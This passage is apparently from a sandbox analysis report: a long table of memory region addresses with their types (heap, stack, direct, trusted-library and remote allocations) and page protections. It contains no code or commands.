page read and write
|
||
|
20D165C1000
|
heap
|
page read and write
|
||
|
156FCB79000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1685D000
|
heap
|
page read and write
|
||
|
3D92000
|
system
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
263E000
|
stack
|
page read and write
|
||
|
78D0000
|
heap
|
page read and write
|
||
|
1ED05ACE000
|
trusted library allocation
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
20D16613000
|
heap
|
page read and write
|
||
|
2A60000
|
trusted library allocation
|
page read and write
|
||
|
438A000
|
stack
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
4340000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
8DA0000
|
direct allocation
|
page execute and read and write
|
||
|
20D1673F000
|
heap
|
page read and write
|
||
|
20D16769000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
26329B50000
|
heap
|
page read and write
|
||
|
7622000
|
heap
|
page read and write
|
||
|
20D169C2000
|
heap
|
page read and write
|
||
|
20D16BA0000
|
remote allocation
|
page read and write
|
||
|
20D165FE000
|
heap
|
page read and write
|
||
|
43BE000
|
heap
|
page read and write
|
||
|
156FAB59000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FCA90000
|
heap
|
page execute and read and write
|
||
|
156FCAD0000
|
heap
|
page execute and read and write
|
||
|
20440000
|
unclassified section
|
page execute and read and write
|
||
|
6B30000
|
direct allocation
|
page read and write
|
||
|
A8E000
|
unkown
|
page readonly
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
3BAB2FE000
|
stack
|
page read and write
|
||
|
3914000
|
unclassified section
|
page read and write
|
||
|
1FCEF000
|
stack
|
page read and write
|
||
|
75CE000
|
heap
|
page read and write
|
||
|
47FE000
|
stack
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
1294000
|
heap
|
page read and write
|
||
|
7FFD34941000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
21887000
|
unclassified section
|
page execute and read and write
|
||
|
20D165D2000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D146E0000
|
heap
|
page read and write
|
||
|
7FFD34B00000
|
trusted library allocation
|
page read and write
|
||
|
1561000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156804F1000
|
trusted library allocation
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FC502000
|
heap
|
page read and write
|
||
|
20D1661C000
|
heap
|
page read and write
|
||
|
4CC000
|
stack
|
page read and write
|
||
|
156FAAC5000
|
heap
|
page read and write
|
||
|
25E657D0000
|
heap
|
page read and write
|
||
|
4290000
|
heap
|
page read and write
|
||
|
20D16847000
|
heap
|
page read and write
|
||
|
156818BD000
|
trusted library allocation
|
page read and write
|
||
|
6A8D000
|
stack
|
page read and write
|
||
|
72FD000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16743000
|
heap
|
page read and write
|
||
|
352C000
|
unclassified section
|
page read and write
|
||
|
6C0E000
|
stack
|
page read and write
|
||
|
1ED05AA6000
|
trusted library allocation
|
page read and write
|
||
|
15690010000
|
trusted library allocation
|
page read and write
|
||
|
5DCE000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1290000
|
heap
|
page read and write
|
||
|
46E0000
|
direct allocation
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
A97000
|
unkown
|
page readonly
|
||
|
20D165B9000
|
heap
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D166A6000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
1FC70000
|
remote allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7DBD000
|
heap
|
page read and write
|
||
|
26CF000
|
stack
|
page read and write
|
||
|
71E8000
|
trusted library allocation
|
page read and write
|
||
|
156FCB9E000
|
heap
|
page read and write
|
||
|
20D167A9000
|
heap
|
page read and write
|
||
|
20D1675C000
|
heap
|
page read and write
|
||
|
7660000
|
heap
|
page read and write
|
||
|
20D165DD000
|
heap
|
page read and write
|
||
|
7F52000
|
heap
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
4470000
|
heap
|
page read and write
|
||
|
20D1682E000
|
heap
|
page read and write
|
||
|
7FFD3494A000
|
trusted library allocation
|
page read and write
|
||
|
221D7B9000
|
stack
|
page read and write
|
||
|
1568047B000
|
trusted library allocation
|
page read and write
|
||
|
20D165A1000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
6B40000
|
direct allocation
|
page read and write
|
||
|
20D16641000
|
heap
|
page read and write
|
||
|
440E000
|
stack
|
page read and write
|
||
|
7F77000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FCB8B000
|
heap
|
page read and write
|
||
|
CF0000
|
unkown
|
page readonly
|
||
|
26329C80000
|
heap
|
page read and write
|
||
|
3312000
|
unclassified section
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
156FC660000
|
heap
|
page read and write
|
||
|
20D1675C000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1ED0590C000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
6ACB000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
3BAAFFB000
|
stack
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
43B4000
|
heap
|
page read and write
|
||
|
20D1671B000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
75B4000
|
heap
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
785E000
|
stack
|
page read and write
|
||
|
727F000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
221D6BE000
|
stack
|
page read and write
|
||
|
20D16742000
|
heap
|
page read and write
|
||
|
20D16745000
|
heap
|
page read and write
|
||
|
7DC5000
|
heap
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7C9F000
|
stack
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
20D16690000
|
heap
|
page read and write
|
||
|
156FAB66000
|
heap
|
page read and write
|
||
|
DF0000
|
unkown
|
page read and write
|
||
|
6FA000
|
heap
|
page read and write
|
||
|
714B000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D166FA000
|
heap
|
page read and write
|
||
|
7C5000
|
heap
|
page read and write
|
||
|
1568049E000
|
trusted library allocation
|
page read and write
|
||
|
1ED03F42000
|
heap
|
page read and write
|
||
|
75B9000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
430C000
|
stack
|
page read and write
|
||
|
2B50000
|
unkown
|
page readonly
|
||
|
4680000
|
direct allocation
|
page read and write
|
||
|
A95000
|
unkown
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
28DF000
|
heap
|
page read and write
|
||
|
2710000
|
heap
|
page read and write
|
||
|
1FA8E000
|
stack
|
page read and write
|
||
|
20D169D6000
|
heap
|
page read and write
|
||
|
221D2FF000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
15681DAD000
|
trusted library allocation
|
page read and write
|
||
|
15681E06000
|
trusted library allocation
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
BF1000
|
unkown
|
page readonly
|
||
|
1ED05760000
|
trusted library allocation
|
page read and write
|
||
|
20D165A2000
|
heap
|
page read and write
|
||
|
20432000
|
direct allocation
|
page execute and read and write
|
||
|
20D16623000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
D7A000
|
stack
|
page read and write
|
||
|
7A9000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D167D8000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D167E5000
|
heap
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
83D0000
|
trusted library allocation
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
20D1659C000
|
heap
|
page read and write
|
||
|
2A74000
|
trusted library allocation
|
page read and write
|
||
|
1FC0E000
|
stack
|
page read and write
|
||
|
693E000
|
stack
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
15682063000
|
trusted library allocation
|
page read and write
|
||
|
15680840000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4627000
|
trusted library allocation
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
20D1680B000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
3BAACFF000
|
stack
|
page read and write
|
||
|
156FAA75000
|
heap
|
page read and write
|
||
|
8430000
|
direct allocation
|
page read and write
|
||
|
20D167F2000
|
heap
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
156FCCE0000
|
heap
|
page read and write
|
||
|
20D16627000
|
heap
|
page read and write
|
||
|
A81000
|
unkown
|
page execute read
|
||
|
CF0000
|
unkown
|
page readonly
|
||
|
20D1684E000
|
heap
|
page read and write
|
||
|
48D0000
|
heap
|
page read and write
|
||
|
43BE000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
508000
|
stack
|
page read and write
|
||
|
762F000
|
heap
|
page read and write
|
||
|
26329C50000
|
heap
|
page read and write
|
||
|
8410000
|
trusted library allocation
|
page read and write
|
||
|
7D9F000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156FD090000
|
heap
|
page read and write
|
||
|
20D165BE000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
25E655F4000
|
heap
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
8460000
|
direct allocation
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D166F1000
|
heap
|
page read and write
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
20D1671B000
|
heap
|
page read and write
|
||
|
6F4000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
10DE000
|
heap
|
page read and write
|
||
|
268E000
|
stack
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
2C42000
|
unkown
|
page read and write
|
||
|
A70000
|
unkown
|
page readonly
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
20D1673B000
|
heap
|
page read and write
|
||
|
7D1F000
|
stack
|
page read and write
|
||
|
15681DD5000
|
trusted library allocation
|
page read and write
|
||
|
2021D000
|
direct allocation
|
page execute and read and write
|
||
|
4D8A000
|
stack
|
page read and write
|
||
|
20D16700000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
20D16745000
|
heap
|
page read and write
|
||
|
20D1685D000
|
heap
|
page read and write
|
||
|
9D0000
|
unkown
|
page readonly
|
||
|
20D16BA0000
|
remote allocation
|
page read and write
|
||
|
20D16606000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
1ED05A01000
|
trusted library allocation
|
page read and write
|
||
|
1ED05800000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34794000
|
trusted library allocation
|
page read and write
|
||
|
20D165DA000
|
heap
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
1ED03F2C000
|
heap
|
page read and write
|
||
|
5534000
|
trusted library allocation
|
page read and write
|
||
|
20D165AD000
|
heap
|
page read and write
|
||
|
15680486000
|
trusted library allocation
|
page read and write
|
||
|
2A9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
4413000
|
heap
|
page read and write
|
||
|
7DB0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D165C6000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
3FAC000
|
system
|
page read and write
|
||
|
2D02000
|
unkown
|
page read and write
|
||
|
20D16BD1000
|
heap
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
156812A5000
|
trusted library allocation
|
page read and write
|
||
|
286E000
|
stack
|
page read and write
|
||
|
10B0000
|
unkown
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
27EE000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D14906000
|
heap
|
page read and write
|
||
|
837E000
|
stack
|
page read and write
|
||
|
2C38000
|
heap
|
page read and write
|
||
|
20D16722000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
1ED03F42000
|
heap
|
page read and write
|
||
|
20D14AF5000
|
heap
|
page read and write
|
||
|
2A70000
|
trusted library allocation
|
page read and write
|
||
|
1FA4C000
|
stack
|
page read and write
|
||
|
7679000
|
heap
|
page read and write
|
||
|
1280000
|
unkown
|
page readonly
|
||
|
68F07FB000
|
stack
|
page read and write
|
||
|
18C1000
|
unkown
|
page readonly
|
||
|
20D14850000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
20D165DE000
|
heap
|
page read and write
|
||
|
221D8BE000
|
stack
|
page read and write
|
||
|
564F000
|
stack
|
page read and write
|
||
|
15681DC6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34972000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16BA0000
|
remote allocation
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
8440000
|
direct allocation
|
page read and write
|
||
|
54D1000
|
trusted library allocation
|
page read and write
|
||
|
46D0000
|
direct allocation
|
page read and write
|
||
|
200DC000
|
heap
|
page read and write
|
||
|
20D167D0000
|
heap
|
page read and write
|
||
|
F5D000
|
system
|
page execute and read and write
|
||
|
7FFD34846000
|
trusted library allocation
|
page read and write
|
||
|
762F000
|
heap
|
page read and write
|
||
|
6F1000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D148F8000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2AC0000
|
trusted library allocation
|
page read and write
|
||
|
6B10000
|
direct allocation
|
page read and write
|
||
|
789F000
|
stack
|
page read and write
|
||
|
20D16603000
|
heap
|
page read and write
|
||
|
20D16790000
|
heap
|
page read and write
|
||
|
7DD3000
|
heap
|
page read and write
|
||
|
44AC000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
765B000
|
heap
|
page read and write
|
||
|
221CFFE000
|
stack
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
2028E000
|
direct allocation
|
page execute and read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
A97000
|
unkown
|
page readonly
|
||
|
221D83E000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D166F1000
|
heap
|
page read and write
|
||
|
1F9CF000
|
stack
|
page read and write
|
||
|
7643000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
20D16855000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
7FA2000
|
heap
|
page read and write
|
||
|
156FCD2B000
|
heap
|
page read and write
|
||
|
20D16634000
|
heap
|
page read and write
|
||
|
7FFD34793000
|
trusted library allocation
|
page execute and read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16826000
|
heap
|
page read and write
|
||
|
4340000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
279A000
|
heap
|
page read and write
|
||
|
156FCB17000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4475000
|
heap
|
page read and write
|
||
|
20D1681B000
|
heap
|
page read and write
|
||
|
9890000
|
direct allocation
|
page execute and read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
75B2000
|
heap
|
page read and write
|
||
|
4D4C000
|
stack
|
page read and write
|
||
|
1ED03F50000
|
heap
|
page read and write
|
||
|
7DE0000
|
heap
|
page read and write
|
||
|
20067000
|
heap
|
page read and write
|
||
|
1FACE000
|
stack
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
72811FF000
|
stack
|
page read and write
|
||
|
302D000
|
direct allocation
|
page execute and read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
20D14908000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
6FA000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
221D37E000
|
stack
|
page read and write
|
||
|
A3A000
|
stack
|
page read and write
|
||
|
20D16743000
|
heap
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
221E60B000
|
stack
|
page read and write
|
||
|
2EAE000
|
stack
|
page read and write
|
||
|
EF0000
|
heap
|
page read and write
|
||
|
3252000
|
unclassified section
|
page read and write
|
||
|
20D1673F000
|
heap
|
page read and write
|
||
|
7DCA000
|
heap
|
page read and write
|
||
|
10DA000
|
heap
|
page read and write
|
||
|
156FC420000
|
trusted library allocation
|
page read and write
|
||
|
483E000
|
stack
|
page read and write
|
||
|
20D1671E000
|
heap
|
page read and write
|
||
|
25E655C0000
|
heap
|
page read and write
|
||
|
1FD80000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
75D8000
|
heap
|
page read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
487F000
|
stack
|
page read and write
|
||
|
7655000
|
heap
|
page read and write
|
||
|
10B0000
|
unkown
|
page read and write
|
||
|
20D1673B000
|
heap
|
page read and write
|
||
|
20D165D5000
|
heap
|
page read and write
|
||
|
1211000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
6F71000
|
heap
|
page read and write
|
||
|
2B50000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
20D16990000
|
heap
|
page read and write
|
||
|
20D14AF8000
|
heap
|
page read and write
|
||
|
20D167FA000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page readonly
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
1294000
|
heap
|
page read and write
|
||
|
20D1673C000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D165EF000
|
heap
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
7DC7000
|
heap
|
page read and write
|
||
|
BE0000
|
unkown
|
page read and write
|
||
|
156FC460000
|
heap
|
page execute and read and write
|
||
|
372F000
|
unkown
|
page read and write
|
||
|
156804B3000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
2C76000
|
heap
|
page read and write
|
||
|
20D169D3000
|
heap
|
page read and write
|
||
|
8165000
|
trusted library allocation
|
page read and write
|
||
|
20D169E8000
|
heap
|
page read and write
|
||
|
DA1000
|
heap
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
20D1685D000
|
heap
|
page read and write
|
||
|
10DE000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
568E000
|
stack
|
page read and write
|
||
|
156FC3F0000
|
heap
|
page read and write
|
||
|
20D165CE000
|
heap
|
page read and write
|
||
|
20D166E9000
|
heap
|
page read and write
|
||
|
7079000
|
heap
|
page read and write
|
||
|
20D1661F000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7DD5000
|
heap
|
page read and write
|
||
|
7628000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
2AA2000
|
trusted library allocation
|
page read and write
|
||
|
1ED05921000
|
trusted library allocation
|
page read and write
|
||
|
20D16B2C000
|
heap
|
page read and write
|
||
|
15680856000
|
trusted library allocation
|
page read and write
|
||
|
1FB7F000
|
stack
|
page read and write
|
||
|
4417000
|
heap
|
page read and write
|
||
|
20D165D7000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16791000
|
heap
|
page read and write
|
||
|
6BCA000
|
stack
|
page read and write
|
||
|
20D166E9000
|
heap
|
page read and write
|
||
|
7DDB000
|
heap
|
page read and write
|
||
|
43B6000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
156FAA20000
|
heap
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
20D16743000
|
heap
|
page read and write
|
||
|
333D000
|
stack
|
page read and write
|
||
|
464F000
|
stack
|
page read and write
|
||
|
7280D4D000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16939000
|
heap
|
page read and write
|
||
|
7C9000
|
heap
|
page read and write
|
||
|
43B6000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
1C9000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D167D5000
|
heap
|
page read and write
|
||
|
2B9B000
|
heap
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
34EE000
|
stack
|
page read and write
|
||
|
7DD0000
|
heap
|
page read and write
|
||
|
156FCC03000
|
heap
|
page read and write
|
||
|
221D73C000
|
stack
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
1ED05740000
|
heap
|
page read and write
|
||
|
20D1673F000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16745000
|
heap
|
page read and write
|
||
|
65FADBF000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
2F1C000
|
unkown
|
page read and write
|
||
|
221E40E000
|
stack
|
page read and write
|
||
|
D00000
|
unkown
|
page readonly
|
||
|
1ED03F10000
|
heap
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
20D166A1000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20219000
|
direct allocation
|
page execute and read and write
|
||
|
28E2000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
4690000
|
direct allocation
|
page read and write
|
||
|
20D16591000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D169F9000
|
heap
|
page read and write
|
||
|
20D14881000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
15680227000
|
trusted library allocation
|
page read and write
|
||
|
20D1685D000
|
heap
|
page read and write
|
||
|
713E000
|
heap
|
page read and write
|
||
|
2FB0000
|
unkown
|
page execute and read and write
|
||
|
20D1663B000
|
heap
|
page read and write
|
||
|
15681E47000
|
trusted library allocation
|
page read and write
|
||
|
4417000
|
heap
|
page read and write
|
||
|
1FCAE000
|
stack
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
83BC000
|
stack
|
page read and write
|
||
|
23DE000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16AC3000
|
heap
|
page read and write
|
||
|
20D16638000
|
heap
|
page read and write
|
||
|
38D0000
|
heap
|
page read and write
|
||
|
3BAA9FE000
|
stack
|
page read and write
|
||
|
221E48E000
|
stack
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page execute and read and write
|
||
|
156FC485000
|
heap
|
page read and write
|
||
|
20D167E8000
|
heap
|
page read and write
|
||
|
20D16993000
|
heap
|
page read and write
|
||
|
D7A000
|
stack
|
page read and write
|
||
|
3496000
|
unkown
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16A1D000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
82FC000
|
stack
|
page read and write
|
||
|
10F9000
|
heap
|
page read and write
|
||
|
156FCD82000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1679C000
|
heap
|
page read and write
|
||
|
3242000
|
direct allocation
|
page execute and read and write
|
||
|
F67000
|
system
|
page execute and read and write
|
||
|
20D167B4000
|
heap
|
page read and write
|
||
|
20D166F1000
|
heap
|
page read and write
|
||
|
353C000
|
heap
|
page read and write
|
||
|
4413000
|
heap
|
page read and write
|
||
|
2006B000
|
heap
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
20D14904000
|
heap
|
page read and write
|
||
|
B74000
|
heap
|
page read and write
|
||
|
A97000
|
unkown
|
page readonly
|
||
|
20D1674C000
|
heap
|
page read and write
|
||
|
5D8D000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
47BC000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
68F0FFD000
|
stack
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
221D3FC000
|
stack
|
page read and write
|
||
|
4360000
|
heap
|
page read and write
|
||
|
382F000
|
stack
|
page read and write
|
||
|
20D165EB000
|
heap
|
page read and write
|
||
|
20D166A1000
|
heap
|
page read and write
|
||
|
7DCD000
|
heap
|
page read and write
|
||
|
A8E000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
7EC0000
|
heap
|
page read and write
|
||
|
20D16729000
|
heap
|
page read and write
|
||
|
7634000
|
heap
|
page read and write
|
||
|
6B00000
|
direct allocation
|
page read and write
|
||
|
44D1000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1663A000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
20D167BD000
|
heap
|
page read and write
|
||
|
2715000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
|
20D1672E000
|
heap
|
page read and write
|
||
|
4477000
|
heap
|
page read and write
|
||
|
1FB3E000
|
stack
|
page read and write
|
||
|
156FC4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
1090000
|
unkown
|
page readonly
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1660E000
|
heap
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page read and write
|
||
|
44C0000
|
heap
|
page read and write
|
||
|
20D16A47000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
10FC000
|
stack
|
page read and write
|
||
|
20D16593000
|
heap
|
page read and write
|
||
|
1ED03F1F000
|
heap
|
page read and write
|
||
|
28D4000
|
heap
|
page read and write
|
||
|
75CA000
|
heap
|
page read and write
|
||
|
7D5E000
|
stack
|
page read and write
|
||
|
20D16A74000
|
heap
|
page read and write
|
||
|
7126000
|
heap
|
page read and write
|
||
|
7F4E000
|
heap
|
page read and write
|
||
|
20D16636000
|
heap
|
page read and write
|
||
|
68F17FE000
|
stack
|
page read and write
|
||
|
71F0000
|
heap
|
page execute and read and write
|
||
|
13C0000
|
unkown
|
page read and write
|
||
|
20D16776000
|
heap
